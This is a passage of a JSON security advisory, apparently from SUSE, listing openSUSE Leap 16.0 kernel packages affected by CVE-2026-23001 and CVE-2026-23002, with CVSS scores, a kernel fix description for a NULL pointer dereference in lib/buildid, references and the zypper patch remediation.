"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2026-23001"
},
{
"cve": "CVE-2026-23002",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23002"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlib/buildid: use __kernel_read() for sleepable context\n\nPrevent a \"BUG: unable to handle kernel NULL pointer dereference in\nfilemap_read_folio\".\n\nFor the sleepable context, convert freader to use __kernel_read() instead\nof direct page cache access via read_cache_folio(). This simplifies the\nfaultable code path by using the standard kernel file reading interface\nwhich handles all the complexity of reading file data.\n\nAt the moment we are not changing the code for non-sleepable context which\nuses filemap_get_folio() and only succeeds if the target folios are\nalready in memory and up-to-date. The reason is to keep the patch simple\nand easier to backport to stable kernels.\n\nSyzbot repro does not crash the kernel anymore and the selftests run\nsuccessfully.\n\nIn the follow up we will make __kernel_read() with IOCB_NOWAIT work for\nnon-sleepable contexts. In addition, I would like to replace the\nsecretmem check with a more generic approach and will add fstest for the\nbuildid code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23002",
"url": "https://www.suse.com/security/cve/CVE-2026-23002"
},
{
"category": "external",
"summary": "SUSE Bug 1257243 for CVE-2026-23002",
"url": "https://bugzilla.suse.com/1257243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
